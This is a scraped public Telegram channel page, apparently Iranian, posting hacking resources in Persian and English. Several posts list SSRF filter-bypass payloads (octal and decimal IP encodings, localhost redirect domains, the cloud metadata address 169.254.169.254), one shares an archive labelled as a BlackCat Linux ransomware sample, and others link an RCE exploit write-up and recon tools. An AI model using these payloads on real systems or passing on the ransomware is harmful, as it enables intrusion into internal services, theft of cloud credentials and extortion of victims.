CyberSecurity – Telegram
CyberSecurity
@matitanium
901 subscribers
122 photos
26 videos
73 files
146 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
About
Blog
Apps
Platform
Join
CyberSecurity
901 subscribers
CyberSecurity
کتاب آموزش کامل ترموکس.PDF
6.2 MB
کتاب آموزش کامل ترموکس و دستورات لینوکسی با تصویر و مثال
465 views
CyberSecurity
CSRF (Cross Site Request Forgery) - HackTricks
1.7 MB
377 views
CyberSecurity
Windows 10 RCE

The exploit is in the link

Link : https://positive.security/blog/ms-officecmd-rce

#RCE
positive.security
Windows 10 RCE: The exploit is in the link | Positive Security
Chaining a misconfiguration in IE11/Edge Legacy with an argument injection in a Windows 10/11 default URI handler and a bypass for a previous Electron patch, we developed a drive-by RCE exploit for Windows 10. The main vulnerability in the ms-officecmd URI…
306 views
CyberSecurity
lets go for ssrf bypass
358 views
CyberSecurity
Bypass using octal IP

Implementations differ on how to handle octal format of ipv4.



http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
299 views
CyberSecurity
Bypass using a decimal IP location



http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254
314 views
CyberSecurity
Bypass localhost with CIDR
It's a /8

http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
313 views
CyberSecurity
Basic SSRF v1

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
315 views
CyberSecurity
Bypass localhost with a domain redirection
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
328 views
CyberSecurity
using this website for convert ip to integer and bypass🤤


https://www.browserling.com/tools/ip-to-dec
356 viewsedited  
CyberSecurity
#log4j !!!
https://news.1rj.ru/str/matitanium
367 viewsedited  
CyberSecurity
BlackCat_Linux_Ransom.7z
1.2 MB
😈BlackCat Ransomware Linux variant.😈

-V x32:
843001980e5073c7f0ea8b56873246b8

-V x64: 79fea7f741760ea21ff655137af05bd0


#kernel #blackcat #ransomware #linux

@matitanium
322 viewsedited  
CyberSecurity
https://github.com/projectdiscovery/httpx
GitHub
GitHub - projectdiscovery/httpx: httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp…
httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. - projectdiscovery/httpx
335 views
CyberSecurity
https://github.com/projectdiscovery/subfinder
GitHub
GitHub - projectdiscovery/subfinder: Fast passive subdomain enumeration tool.
Fast passive subdomain enumeration tool. Contribute to projectdiscovery/subfinder development by creating an account on GitHub.
363 views
CyberSecurity
https://github.com/lc/gau
GitHub
GitHub - lc/gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. - lc/gau
370 views
CyberSecurity
342 views
CyberSecurity
342 views
CyberSecurity
https://github.com/jaeles-project/gospider
GitHub
GitHub - jaeles-project/gospider: Gospider - Fast web spider written in Go
Gospider - Fast web spider written in Go. Contribute to jaeles-project/gospider development by creating an account on GitHub.
334 views
CyberSecurity
CyberSecurity
https://github.com/projectdiscovery/httpx
346 views
CyberSecurity
CyberSecurity
Voice message
برای مثال
subfinder -d example.com | httpx -status-code -ip -mc 200
355 viewsedited  
CyberSecurity
CyberSecurity
برای مثال subfinder -d example.com | httpx -status-code -ip -mc 200
350 views